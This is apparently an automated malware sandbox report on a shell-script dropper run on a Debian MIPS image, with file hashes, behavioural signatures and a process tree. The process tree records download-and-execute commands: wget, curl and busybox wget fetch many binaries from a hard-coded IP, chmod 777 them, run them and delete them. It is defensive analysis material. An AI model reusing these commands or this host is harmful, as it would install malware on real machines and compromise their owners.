Analysis
-
max time kernel
70s -
max time network
99s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
18/10/2024, 02:47
Static task
static1
Behavioral task
behavioral1
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
-
Size
10KB
-
MD5
60c5521dc77c48a75842ba0dbc3fae7c
-
SHA1
9ddfd137b35be8207eb3889a9a93c23ce142e184
-
SHA256
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490
-
SHA512
da9d12e38093b4ed8181f08e6e568d784d062e018ee58f085668c97a33254dcbf2a1dbe9b2ac4098817bfa045b661fb905ef37999c6fe3019ca1e504eb192d6c
-
SSDEEP
192:jorwWDEg9skLEcnrq/7DlhMYDgAiSEg9sk+zjnrq/7DPMYDgAiA:juwWpEt9EdKKA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh/tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh1⤵PID:705
-
/bin/rm/bin/rm bins.sh2⤵PID:708
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:713
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:733
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:741
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:744
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:745
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:747
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:751
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:757
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:762
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:767
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:781
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:787
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:790
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:809
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:814
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:816
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:822
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:849
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:856
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:857
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:867
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:873
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:879
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:885
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:891
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:897
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:903
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:909
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:915
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:921
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:928
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:934
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:940
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:946
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:952
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:958
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:964
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:970
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:976
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:979
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97